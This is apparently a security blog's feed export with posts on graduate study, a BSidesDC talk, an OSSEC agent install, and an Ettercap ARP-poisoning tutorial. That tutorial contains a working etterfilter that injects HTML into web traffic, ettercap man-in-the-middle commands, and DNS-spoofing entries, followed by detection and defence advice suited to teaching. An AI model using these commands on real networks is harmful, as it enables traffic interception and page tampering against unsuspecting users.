tag:blogger.com,1999:blog-2971878401645301512024-02-22T09:34:18.156-05:00Eating SecuritySmall servings of digital security, incident response, NSM, and system administration.Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.comBlogger95125tag:blogger.com,1999:blog-297187840164530151.post-50537055429207232092019-01-22T14:02:00.001-05:002019-01-22T14:02:08.237-05:00What I learned when I earned a MastersFirst, a disclaimer. I am employed by CMU but these views are mine. This is my perspective as a student, but it is impossible to ignore that I am also an employee.<br />
<br />
In 2016, I finally decided to return to get a MS after getting a BS in Information Systems Management on an Information Assurance track in 2007. In December, 2018, I graduated with highest distinction. CMU has a good <a href="https://www.cmu.edu/hr/benefits/tuition/index.html" target="_blank">tuition benefits program</a> and one of my incentives when I accepted employment included the possibility of graduate school.<br />
<br />
For various reasons, a distance curriculum was best for me, so I ended up taking the GRE and going to Heinz College to get a <a href="https://www.heinz.cmu.edu/programs/information-technology-master/information-security-assurance" target="_blank">MSIT: Information Security & Assurance</a>.<br />
<br />
This is the description from CMU's page, "Is MSIT Right For Me?"<br />
<blockquote class="tr_bq">
<i>The Master of Science in Information Technology (MSIT) is a part-time,
distance learning program that is ideal for current IT professionals
seeking to add business acumen, management, and targeted problem-solving
skills to their portfolios. MSIT can also be a great fit for
professionals from less technical areas, such as finance and health
care, who wish to pivot toward technology-intensive roles and improve
their analytical skills.</i> </blockquote>
After completing the program, I would say the description above is fairly accurate and useful. In particular, this degree had a few things that appealed to me.<br />
<ol>
<li>It was at CMU, my employer, so tuition would be free with the caveat of counting as taxable income.</li>
<li>It is geared towards working students.</li>
<li>The degree offered some flexibility in focus and electives.</li>
</ol>
The last allowed me to choose the Information Security & Assurance track, plus balance classes between those focused on the business side and technical classes. Since I can take short technical classes as part of professional development at work, I decided it made sense to focus on the business, management, and leadership more while focusing my technical classes in areas where I wanted to improve or get more depth than I would through professional development classes.<br />
<br />
<h3>
Technical classes</h3>
There were a couple areas involving technology or math where I knew that the CMU classes would be challenging and cover material I wouldn't normally have time to learn through professional development. Some were full semesters and some were half semester classes, called "minis" by Heinz College.<br />
<br />
I focused on a few areas in my technical classes. These were areas where I thought I could use more formal teaching, might be directly related to my work, or in subjects where I thought justifying professional development would be difficult but the classes would still have some application in my career. The highlights that I think were most useful for me included the following.<br />
<ul>
<li>An object-oriented programming class using Java.</li>
<li>An economic analysis class that started with more general economics then focused on the economics of IT, including implications for management and strategy. </li>
<li>A useful refresher on statistics covering descriptive statistics, statistical inference, and regression analysis, including applying statistical analysis to analyze IT problems. This also was a prerequisite for some other courses.</li>
<li>Exploring and visualizing data was very relevant to my current job and this class was focused primarily on exploring data sets using R. I had used R previously, but this class let me do a lot more and I enjoyed the final project.</li>
<li>Geographic information systems (GIS) was a very fun course, though I'm
not sure I will use a lot of the skills directly. It did help me
appreciate how much goes into geographic data analysis and information
displays and teach me some lessons that apply to information presentation across disciplines.</li>
<li>Penetration testing was probably the class where my motivation for
enrolling was closest to, "I want something that will be technical and
fun." It was a fun class, but also very tough and frustrating at times
when getting stuck on the challenge labs </li>
</ul>
<h3>
</h3>
<h3>
Business, leadership, and policy classes </h3>
The other classes were in areas I thought would benefit me and my career because they were in areas where I might have had experience, but little formal education or knowledge. Examples include:<br />
<ul>
<li>Privacy in the digital age was a great class focusing on privacy that, "...combines technical, economic, legal,and policy perspectives to present a holistic view of its role and value in the digital age (from the syllabus)." It was a very useful class for anyone in information security given the privacy issues in today's world, many of them having direct impact on how we do our jobs in information security.</li>
<li>I learned a fair amount on strategy development for organizations and businesses, which included useful lessons and the history of creating organizational strategies. It used case studies really well to show the impact that an effective organizational strategy can bring.</li>
<li>Almost anyone will improve by taking a good writing class, so I was happy to take business writing for leaders even though I find writing courses somewhat stressful. I'm used to writing many papers, but writing for a writer, the professor in this case, can be intimidating.</li>
<li>Several courses covering information security management, governance, process, policies, and risk management. Most of these were required as part of the Information Security & Assurance focus.</li>
</ul>
This doesn't cover all of my classes, which I think ended up being about
16-18 classes total, mixing full semester classes and minis.<br />
<br />
<h3>
Do you need a degree or certification?</h3>
Why am I writing about this? Because there is an ongoing discussion through the field of information security ("cybersecurity") about the relevance of degrees, certifications, and other credentials. There are also related questions about how people should enter the career of cybersecurity. My answer to any question about what someone needs will always be situational. Individual circumstances will make a huge difference in any examination of the cost/benefit for a specific degree or certification. Context is the key to answering questions about career transition, degrees, and certifications, because no one answer is correct for everyone.<br />
<br />
In my case, the pro-degree arguments, benefits, or positive implications were:<br />
<ul>
<li>I work for a university, so graduate degrees are encouraged and valued.</li>
<li>Employee benefits include free tuition at CMU.</li>
<li>The degree was available online, allowing a flexible school schedule.</li>
<li>The degree offered many classes that were useful towards improving myself as a professional.</li>
<li>I saw the potential to make myself more valuable as a mid- to late career professional.</li>
<li>I saw the potential to refresh skills I already have or learn new skills. </li>
<li>It provided a chance to take some longer-running technical classes that allowed more depth than typical professional development.</li>
</ul>
Some of the costs or drawbacks included:<br />
<ul>
<li>It took a lot of time out of my life. The recommendation was to budget 12 hours per week per class, and that was fairly accurate. Some classes were a little less, some were much more.</li>
<li>Despite the free tuition, it still cost me money in books, time, and tax liability.</li>
<li>It was very stressful for me, particularly since I wasn't satisfied with simply passing but was trying to excel.</li>
<li>A small number of the classes covered fair chunks of material where I already have extensive experience, making them somewhat less interesting.</li>
</ul>
Given all this and more, I think it was the right decision for me. I started seeing the benefit of applying some of my learning at my work while still in school and I expect to continue leveraging some of the material going forward. It also made me examine my career and think more about where I want to go in the future. I could have pursued a more purely technical degree or even more on the business side instead of the mixed program, but I think I made the correct choice for my background and future goals.<br />
<br />
What should you consider when trying to decide about a degree or certifications? I covered a lot of it in my benefits and costs, including time, cost, personal situation, professional situation, goals, and intangibles. I think certifications are generally a good way for earlier career professionals to boost their credentials a bit and I had a number of them when I first entered IT. Some jobs obviously require certifications, making the decision fairly simple. Some certifications are also more useful than others, so that can enter into the equation. The costs and benefits of a degree are generally both more significant but the basic factors to consider are similar.<br />
<br />
For underrepresented groups, degrees and certifications are often much more important because of disparities in opportunities. I got a MCSE, CCNP, and SANS certifications early in my career but was able to get into IT without a degree and without either of those certifications complete. Not everyone, even when they're capable, will get those opportunities.<br />
<br />
I started in IT nearly 20 years ago so my analysis entering the field today would also be different. I did three interviews and got three offers when I was looking for my first IT job, but degrees and certifications have become more typical requirements or wants in recent years. None of my old Microsoft and Cisco certifications are current today and it likely has little impact on my credentials given my experience and degrees. It would likely be a different story if I was still early in my career or switching careers.<br />
<br />
I will also point out is that I don't see how having a degree or certification should ever count against someone unless it is literally a scam like a diploma mill or something similar. Someone who earnestly gets a well-known and honest certification should not be looked down upon. The MCSE, CCNP, and SANS certifications all taught me a lot and forced me to also teach myself to successfully pass the exams.<br />
<br />
<h3>
What's next?</h3>
One thing we can probably all agree with is that cybersecurity requires constant learning and change to be successful. The IT environment today is drastically different than when I entered the field. While many of the baseline skills remain constant, the evolution of IT, for example from Windows NT to Active Directory to IT infrastructure in the cloud, mean that we better be learning so we adapt to our skills to current environments and technologies. For me, the first step is always self-study, reading, and experimentation, but this is not the only answer for developing skills and expertise.<br />
<br />
Since I am done with school, I'll likely be pursing professional development in technical areas to improve the depth of my skills. This will likely include a certification or two as a way to set a goal and timetable for learning specific topics. Examples of general topics like cloud security, cloud architecture, machine learning, security orchestration, edge computing, and mobile computing are all areas that are currently in flux and will require professionals to make changes as the technologies continue maturing. Everyone in cybersecurity needs methods to stay current in the face of changing technology.<br />
<h3>
</h3>
Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com0tag:blogger.com,1999:blog-297187840164530151.post-31405298798517367282015-03-05T13:58:00.000-05:002015-03-05T13:58:02.748-05:00Reflections on BSidesDC 2014 Talk: Meatspace Indicators and IRThis is long overdue, but I finally am posting a recap of my <a href="http://www.bsidesdc.org/" target="_blank">BSidesDC</a> talk from October 2014. The talk was based on my previous blog post, <a href="http://eatingsecurity.blogspot.com/2012/06/practical-example-of-non-technical.html" target="_blank">A Practical Example of Non-technical Indicators and Incident Response</a>. For my BSidesDC talk, I tweaked the title slightly to "Meatspace Indicators and Incident Response: A Story From the Lab of Nate Richmond."<br />
<br />
Overall, I think the talk went well. To give people an idea of preparation, I did two dry runs of the talk. The first was for my coworkers, who then gave me valuable feedback on the content and suggestions for improvements. It also gave me a good idea whether the material filled the time I had for my talk. Whether or not you're giving a talk sponsored by your employer, it's a great idea to get feedback from peers before submitting or giving the talk.<br />
<br />
Since the talk used my family as an example, I also did a dry run for them after modifying the content based on the feedback my coworkers gave to me. The main reason to give the talk to my family was to make sure they were all comfortable with what I said during the talk, but also to get some feedback and be fully transparent with them about what I do with our home network.<br />
<br />
I felt slightly guilty about using material from a couple years ago for a conference, but in the end I decided it was still relevant. I think the material was very well-suited for BSides rather than a larger conference.<br />
<br />
I embedded the video from YouTube below. After the video, I have some comments and critiques of my talk that I noted when watching the video. It can be very painful to watch and listen to yourself, particularly for those of us who are driven to be good at the things we do and thus are very critical of ourselves, but it's always important to review what you've done so you can do it better the next time. I definitely missed a few points that I had in my notes and also rushed a bit, finishing 10 minutes early. I probably should have done at least one more dry run.<br />
<br />
I hope it was informative, useful, and entertaining for those that attended or watched later.<br />
<br />
I'd very much like to thank BSidesDC for having me. I enjoyed the conference both as a speaker and an attendee. I highly recommend checking out your local <a href="http://www.securitybsides.com/" target="_blank">BSides</a> if you get the chance. I like their focus on community, collaboration, and keeping the cost for attendees to a minimum.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe width="320" height="266" class="YOUTUBE-iframe-video" data-thumbnail-src="https://ytimg.googleusercontent.com/vi/j0EtpjNWEDU/0.jpg" src="http://www.youtube.com/embed/j0EtpjNWEDU?feature=player_embedded" frameborder="0" allowfullscreen></iframe></div>
<br />
The "Introduction" slide was meant in part to set up a short musing on the stickers people put on the backs of their cars to represent their family. Sorry if you have these, but they really bug me for some reason.<br />
<br />
I think I did emphasize my two main points, which are that security practitioners sometimes forget their goals in terms of supporting the business they're protecting, and that we also can be overly focused on the latest technology when there are many indicators of compromise that require no technology at all.<br />
<br />
If I gave this talk again, I would add a slide after "Additional Context" to show a little more about my home lab architecture. It would have made sense to leverage a little material from my blog posts <a href="http://eatingsecurity.blogspot.com/2013/04/new-home-lab-configuration.html" target="_blank">New Home Lab Configuration</a> and <a href="http://eatingsecurity.blogspot.com/2013/04/home-lab-part-2-vmware-esxi-security.html" target="_blank">Home Lab Part 2</a>. I did have links to these posts in my presentation but forgot to point them out to my audience. I also had intended to point out the evolution of my lab from a stand-alone Sguil installation running on a 700MHz w/512MB RAM prior to the creation of Security Onion to its current incarnation using virtual machines on a much faster machine.<br />
<br />
Regarding Terms of Service and expectations of privacy, I firmly believe in what I stated during the presentation. Whether it's a business or personal network, it's very important to let your users know what is expected of them and also what is expected of those monitoring the network. It's also important for those doing network monitoring to properly adhere to these terms. When network monitoring and incident response is part of your job, you should not be taking advantage of your access to root around in people's personal business for fun. You should only be doing what is required to effectively do your job.<br />
<br />
During the discussion of the changing landscape and countermeasures, I forgot to repeat the comments from the audience. This bothers me since I had explicitly reminded myself beforehand to repeat comments so everyone could hear them. If you are ever a presenter and the audience doesn't have microphones, please try to repeat any substantial questions or comments for the rest of the audience.<br />
<br />
Finally, I had some other examples and discussion for the slide about "Why Does This Matter?" but neglected to glance at my notes. The bottom line is that we sometimes get caught up in the mentality of "nuke entire the site from orbit--it's the only way to be sure" rather than examining other possibilities that would still be effective but less disruptive to the business.Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com0tag:blogger.com,1999:blog-297187840164530151.post-91535325789631979492013-05-14T10:23:00.000-04:002013-05-14T10:23:07.366-04:00More Ettercap and ARP PoisoningMy <a href="http://eatingsecurity.blogspot.com/2011/02/using-ettercap-for-arp-poisoning.html">previous post</a> about <a href="http://ettercap.github.io/ettercap/">Ettercap</a> gets a lot of hits, so I thought I should post a deeper look at some of the features with examples of usage. Before continuing, I'll point out a couple other good resources since some of my work is just building on that of others.<br />
<br />
Irongeek has a couple good pages dealing with Ettercap.<br />
<ul>
<li><a href="http://www.irongeek.com/i.php?page=security/ettercapfilter">Fun with Ettercap Filters</a></li>
<li><a href="http://www.irongeek.com/i.php?page=security/arpspoof">The Basics of Arpspoofing/Arppoisoning</a></li>
</ul>
There is plenty more information there if you search his site, plus a number of other sites and forums where you can find information.<br />
<br />
I decided to show a couple examples, then relate them to NSM and ways to detect ARP poisoning. I happen to be using FreeBSD as the attacking system in this case, and a Windows 7 system as the targeted system. For my experiment, I'll use the following image.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY6fyoF3OxiszT7_hlfbDGYC8_xkIGRrx3REa6_qTYPRHTwVKJzs_IJ1VuY2xbURrYeT84ni6fPKvPhI0WzKqxF64kU2gmsHGnZ_DoJYd8D4QtS8oGExr17GegwF5sZ9cTxO2ubcDB02yW/s1600/pwned+DH.jpg"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY6fyoF3OxiszT7_hlfbDGYC8_xkIGRrx3REa6_qTYPRHTwVKJzs_IJ1VuY2xbURrYeT84ni6fPKvPhI0WzKqxF64kU2gmsHGnZ_DoJYd8D4QtS8oGExr17GegwF5sZ9cTxO2ubcDB02yW/s400/pwned+DH.jpg" /></a><br />
<br />
Here is the filter I used to replace the page title and body with my own title and body. It includes segments from Irongeek's filter, so I'll include the GPL notice.<br />
<br />
<pre>############################################################################
# #
# nr.filter -- filter source file #
# Based on work by Irongeek and others http://www.irongeek.com/ #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
if (search(DATA.data, "gzip")) {
replace("gzip", " ");
msg("whited out gzip!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("<title>", "<title>PWNED<\/tITle><bodY><p><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY6fyoF3OxiszT7_hlfbDGYC8_xkIGRrx3REa6_qTYPRHTwVKJzs_IJ1VuY2xbURrYeT84ni6fPKvPhI0WzKqxF64kU2gmsHGnZ_DoJYd8D4QtS8oGExr17GegwF5sZ9cTxO2ubcDB02yW/s400/pwned+DH.jpg"></p></boDY>");
replace("<TITLE>", "<title>PWNED<\/tITle><bodY><p><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY6fyoF3OxiszT7_hlfbDGYC8_xkIGRrx3REa6_qTYPRHTwVKJzs_IJ1VuY2xbURrYeT84ni6fPKvPhI0WzKqxF64kU2gmsHGnZ_DoJYd8D4QtS8oGExr17GegwF5sZ9cTxO2ubcDB02yW/s400/pwned+DH.jpg"></p></boDY>");
replace("</title>", " ");
replace("</TITLE>", " ");
replace("<body>", " ");
replace("<BODY>", " ");
msg("Filter Ran.\n");
}
</pre>
This filter is designed to replace the "title" tag with a new title plus a body that links to the image. Then at the end of the filter, I attempt to replace the original page's title closing tag with a space since I already closed the tag, and then replace the original page's body tag with a space to eliminate the body of the page. I believe you could also use a pcre_regex command in the filter to more thoroughly remove the existing page body after inserting the image or other content of your choosing. See the etterfilter manual page for more.<br />
<br />
To compile the filter, I simply execute the following:<br />
<pre>$ etterfilter nr.filter -o nr.ef</pre>
<br />
Then to run ettercap on a FreeBSD VM in this example, I execute the following:<br />
<pre>$ sudo ettercap -i em0 -F nr.ef -T -M arp:remote /172.16.126.2/ /172.16.126.131/</pre>
<br />
The "-T" option is to use the text interface rather than the GUI or ncurses. The "-M" executes a man-in-the-middle with the arguments for ARP poisoning that includes the gateway, which is the first IP address in this case. The second IP address is a Windows system.<br />
<br />
Here are some examples of the results if trying to surf using Chrome on the targeted Windows 7 system.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9824YpOu1CLvz2Fcb7DwV2L1cDCHiTu1ThnkF7bfx-o601aBXzIywLrYKbY5gShmRZBeKqHdGvn40OskhEcFqQxs3XXmS3zyuhf0VFEyshXqXP_u8ziILe3EjuLSQcJlu_beqoZ7xzC-Q/s1600/Screen+Shot+2013-04-24+at+18.05.13+PM.png" style="margin-left: auto; margin-right: auto;"><img border="0" height="465" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9824YpOu1CLvz2Fcb7DwV2L1cDCHiTu1ThnkF7bfx-o601aBXzIywLrYKbY5gShmRZBeKqHdGvn40OskhEcFqQxs3XXmS3zyuhf0VFEyshXqXP_u8ziILe3EjuLSQcJlu_beqoZ7xzC-Q/s640/Screen+Shot+2013-04-24+at+18.05.13+PM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Notice the title is not changed on Slashdot, indicating they do not use a traditional<br />
HTML title tag. The body is also not replaced, just pushed down the page.</td></tr>
</tbody></table>
Here is what Google looks like.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9VvjBp0afrt020BdYcpole7eRPXAFqCSYk4NcqQgf8XBavB7NB72Yiqu6bUOHSPVU5ONlKG7vU6MbXG83ivhtJLGCy01g_2iuWYA9lxfAuL5nzHrSlFddoDxDAFopv6302Mye_z0nLtsk/s1600/Screen+Shot+2013-04-24+at+18.05.49+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9VvjBp0afrt020BdYcpole7eRPXAFqCSYk4NcqQgf8XBavB7NB72Yiqu6bUOHSPVU5ONlKG7vU6MbXG83ivhtJLGCy01g_2iuWYA9lxfAuL5nzHrSlFddoDxDAFopv6302Mye_z0nLtsk/s640/Screen+Shot+2013-04-24+at+18.05.49+PM.png" width="520" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Success.</td></tr>
</tbody></table>
<br />
Finally, here is my blog.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj902vYnaG9fFV7mILIkZ2tFM5hxZpQmXHA5cHIw4bZXSH3wfaUK2lMocC4gHo_lzVZJnmxHTbM6_iPAmv2Cfy1R66ROeCuFvN2mtNDlpLTtt3J01uOkZs2K1E5bcwUvkWpz3svlRBBoY78/s1600/Screen+Shot+2013-04-24+at+18.06.11+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="450" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj902vYnaG9fFV7mILIkZ2tFM5hxZpQmXHA5cHIw4bZXSH3wfaUK2lMocC4gHo_lzVZJnmxHTbM6_iPAmv2Cfy1R66ROeCuFvN2mtNDlpLTtt3J01uOkZs2K1E5bcwUvkWpz3svlRBBoY78/s640/Screen+Shot+2013-04-24+at+18.06.11+PM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Success once again. Both the page title and body are replaced.</td></tr>
</tbody></table>
Another way to show how easy it is to redirect traffic to an unexpected site is with ettercap's DNS spoofing plugin. First, I edit /usr/local/share/ettercap/etter.dns and add the following lines.<br />
<br />
<pre>facebook.com A 216.34.181.45
*.facebook.com A 216.34.181.45
www.facebook.com PTR 216.34.181.45
google.com A 131.253.33.200
*.google.com A 131.253.33.200
www.google.com PTR 131.253.33.200</pre>
<br />
Then I run ettercap with the plugin enabled.
<br />
<pre>$ sudo ettercap -i em0 -P dns_spoof -T -M arp:remote /172.16.126.2/ /172.16.126.131/</pre>
<br />
This 20 second video shows what happens when I then try to go to Google or Facebook from the targeted system.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.blogger.com/video.g?token=AD6v5dzte-Y39nNE1EtBdmiAx6s8e5U4Qa_OxSjKiYnNO5CZQJidpAlED7c6i4yLBQIcSLhnwQ3OLOA4lsJ021svjg' class='b-hbp-video b-uploaded' frameborder='0'></iframe></div>
<br />
This can be fairly amusing, particularly if you are on a lab network where shenanigans are not only acceptable but expected. On the other hand, imagine injecting something more malicious than a funny image like a malicious iFrame or malicious Javascript. I played around with injecting Javascript into pages and it really is trivial if you're in a position to poison the network gateway. A good old-fashioned Rickroll is another good way to demonstrate the attack in a non-malicious way.<br />
<br />
As I mentioned in a <a href="http://eatingsecurity.blogspot.com/2011/02/using-ettercap-for-arp-poisoning.html">previous post about ettercap</a>, <a href="http://www.zdnet.com/blog/security/metasploit-projects-site-hijacked-through-arp-poisoning/1242">the Metasploit site was briefly owned</a> through ARP poisoning in 2008. It is an old-school attack that can still be quite effective if you have access to a system on the same network segment as another system you want to attack.<br />
<br />
Defenses against ARP poisoning are fairly simple to describe but not necessarily practical or easy to implement. The first, mentioned in the Metasploit article, is using static ARP tables so ARP requests over the network are no longer necessary. This may be simple in the case of a single gateway entry, but the larger the network the more administrative overhead to use static ARP entries.<br />
<br />
You can also use software to detect ARP poisoning, for example <a href="http://ee.lbl.gov/">LBNL's arpwatch</a>. Any software that can show you MAC addresses along with IP addresses can potentially be used to detect poisoning since you would see the same IP address in use by multiple MAC addresses. For example, here is what my ARP poisoning with ettercap looks like in Wireshark.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIx7dSp-w73SX_SstbkxN-QCDsR7ECH_obC-7OXv_6WO6ChydMH_YWZTJZkgeHwhyphenhyphen-PN6hIeAEbtOmwFn8GcGMMtGjXNFry_vJBpblU5OlB0BWf25CaWuWijdD0LsiTP1UchFyoQizos4X/s1600/duplicate_IP.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="27" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIx7dSp-w73SX_SstbkxN-QCDsR7ECH_obC-7OXv_6WO6ChydMH_YWZTJZkgeHwhyphenhyphen-PN6hIeAEbtOmwFn8GcGMMtGjXNFry_vJBpblU5OlB0BWf25CaWuWijdD0LsiTP1UchFyoQizos4X/s640/duplicate_IP.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">You can see that the poisoner, 00:0c:29:6d:92:78, is associated with both IP addresses.</td></tr>
</tbody></table>
So, it is easy to see in the traffic but that doesn't mean it is necessarily easy to detect without some analyst intervention. Snort has an <a href="http://manual.snort.org/node17.html#SECTION003214000000000000000">ARP spoofing preprocessor</a>, but it seems likely that an IDS will often be in the wrong position on a network to see ARP traffic. In fact, most networks are probably not instrumented in such a way that you can see ARP traffic on a NSM sensor. It is not actually difficult in a technical sense, but it does require resources to have internal network sensors and make sure the network is architected properly for the sensors to have visibility. There are probably more efficient ways to allocate resources for detection in this case.<br />
<br />
There are still other methods to help detect and prevent ARP spoofing, particularly with network equipment like managed switches. Jeremy Stretch has a good write-up on <a href="http://packetlife.net/blog/2010/aug/18/dhcp-snooping-and-dynamic-arp-inspection/">DHCP Snooping and Dynamic Arp Inspection</a> over at his PacketLife blog showing exactly how DAI can be used to prevent and detect ARP poisoning. You can also read about <a href="http://www.cisco.com/en/US/docs/switches/lan/catalyst6500/ios/12.2SX/configuration/guide/snoodhcp.html">DHCP Snooping</a> and <a href="http://www.cisco.com/en/US/docs/switches/lan/catalyst6500/ios/12.2SX/configuration/guide/dynarp.html">DAI</a> on Cisco's site. This seems like it may be an easier method than IDS deployments since networking equipment is already positioned to see ARP traffic, but it does require equipment that supports ARP inspection.<br />
<br />
I had originally thought of also showing how you could combine Ettercap with Metasploit to inject malicious traffic and more in the above examples, but I decided that would overly complicate this post. It is probably better reserved for a future post.Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com2tag:blogger.com,1999:blog-297187840164530151.post-36578857734466039032013-05-01T14:39:00.000-04:002013-05-01T22:35:25.133-04:00Installing OSSEC agentWith the recent news about the latest <a href="http://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/">Apache backdoor</a> on systems using cPanel, I thought it would be pertinent to show the process of adding an <a href="http://www.ossec.net/">OSSEC</a> agent that connects to a Security Onion server. Why is this relevant? Because OSSEC and other file integrity checkers can detect changes to binaries like Apache's httpd.<br />
<blockquote class="tr_bq">
"OSSEC is an Open Source Host-based Intrusion Detection System that performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response."</blockquote>
Many systems include integrity checking programs in their default installs these days, for instance Red Hat with <a href="http://aide.sourceforge.net/">AIDE</a>. AIDE is also available in repositories for a number of other Linux distributions plus FreeBSD.<br />
<br />
This case in particular would require using something other than the default options for integrity checking because cPanel installs Apache httpd in /usr/local/apache/bin, a non-standard directory that may not be automatically included when computing file hashes and doing subsequent integrity checks.<br />
<br />
The reason I'm demonstrating OSSEC here is that it easily integrates with the Sguil console, and in Security Onion the sensors and server already have OSSEC configured to send alerts to Sguild. OSSEC also has additional functionality compared to AIDE. In this case, I'm installing the agent on a Slackware server.<br />
<pre>$ wget http://www.ossec.net/files/ossec-hids-2.7.tar.gz
---snipped---
$ openssl sha1 ossec-hids-2.7.tar.gz
SHA1(ossec-hids-2.7.tar.gz)= 721aa7649d5c1e37007b95a89e685af41a39da43
$ tar xvzf ossec-hids-2.7.tar.gz
---snipped---
$ sudo ./install.sh
OSSEC HIDS v2.7 Installation Script - http://www.ossec.net
You are about to start the installation process of the OSSEC HIDS.
You must have a C compiler pre-installed in your system.
If you have any questions or comments, please send an e-mail
to dcid@ossec.net (or daniel.cid@gmail.com).
- System: Linux webserver 3.8.4
- User: root
- Host: webserver
-- Press ENTER to continue or Ctrl-C to abort. --
1- What kind of installation do you want (server, agent, local, hybrid or help)? <b>agent</b>
- Agent(client) installation chosen.
2- Setting up the installation environment.
- Choose where to install the OSSEC HIDS [/var/ossec]:
3- Configuring the OSSEC HIDS.
3.1- What's the IP Address or hostname of the OSSEC HIDS server?: <b>192.168.1.20</b>
- Adding Server IP 192.168.1.20
3.2- Do you want to run the integrity check daemon? (y/n) [y]:
- Running syscheck (integrity check daemon).
3.3- Do you want to run the rootkit detection engine? (y/n) [y]:
- Running rootcheck (rootkit detection).
3.4 - Do you want to enable active response? (y/n) [y]:
3.5- Setting the configuration to analyze the following logs:
-- /var/log/messages
-- /var/log/auth.log
-- /var/log/syslog
-- /var/adm/syslog
-- /var/adm/auth.log
-- /var/adm/messages
-- /var/log/xferlog
-- /var/log/proftpd.log
-- /var/log/apache/error_log (apache log)
-- /var/log/apache/access_log (apache log)
-- /var/log/httpd/error_log (apache log)
-- /var/log/httpd/access_log (apache log)
- If you want to monitor any other file, just change
the ossec.conf and add a new localfile entry.
Any questions about the configuration can be answered
by visiting us online at http://www.ossec.net .
--- Press ENTER to continue ---
---snip---
- Init script modified to start OSSEC HIDS during boot.
- Configuration finished properly.
- To start OSSEC HIDS:
/var/ossec/bin/ossec-control start
- To stop OSSEC HIDS:
/var/ossec/bin/ossec-control stop
- The configuration can be viewed or modified at /var/ossec/etc/ossec.conf
Thanks for using the OSSEC HIDS.
If you have any question, suggestion or if you find any bug,
contact us at contact@ossec.net or using our public maillist at
ossec-list@ossec.net
( http://www.ossec.net/main/support/ ).
More information can be found at http://www.ossec.net
--- Press ENTER to finish (maybe more information below). ---
- You first need to add this agent to the server so they
can communicate with each other. When you have done so,
you can run the 'manage_agents' tool to import the
authentication key from the server.
/var/ossec/bin/manage_agents
More information at:
http://www.ossec.net/en/manual.html#ma</pre>
<br />
Next, I add the agent to my Security Onion server.
<br />
<pre>$ sudo /var/ossec/bin/manage_agents
****************************************
* OSSEC HIDS v2.6 Agent manager. *
* The following options are available: *
****************************************
(A)dd an agent (A).
(E)xtract key for an agent (E).
(L)ist already added agents (L).
(R)emove an agent (R).
(Q)uit.
Choose your action: A,E,L,R or Q: <b>A</b>
- Adding a new agent (use '\q' to return to the main menu).
Please provide the following:
* A name for the new agent: <b>webserver</b>
* The IP Address of the new agent: <b>192.168.1.5</b>
* An ID for the new agent[001]:
Agent information:
ID:001
Name:webserver
IP Address:192.168.1.5
Confirm adding it?(y/n): <b>y</b>
****************************************
* OSSEC HIDS v2.6 Agent manager. *
* The following options are available: *
****************************************
(A)dd an agent (A).
(E)xtract key for an agent (E).
(L)ist already added agents (L).
(R)emove an agent (R).
(Q)uit.
Choose your action: A,E,L,R or Q: <b>e</b>
Available agents:
ID: 001, Name: webserver, IP: 192.168.1.5
Provide the ID of the agent to extract the key (or '\q' to quit): <b>001</b>
Agent key information for '001' is:
---snip---
** Press ENTER to return to the main menu.</pre>
<br />
Now copy the key, go back to the web server, paste and import the key.
<br />
<pre>$ sudo /var/ossec/bin/manage_agents
****************************************
* OSSEC HIDS v2.7 Agent manager. *
* The following options are available: *
****************************************
(I)mport key from the server (I).
(Q)uit.
Choose your action: I or Q: <b>i</b>
* Provide the Key generated by the server.
* The best approach is to cut and paste it.
*** OBS: Do not include spaces or new lines.
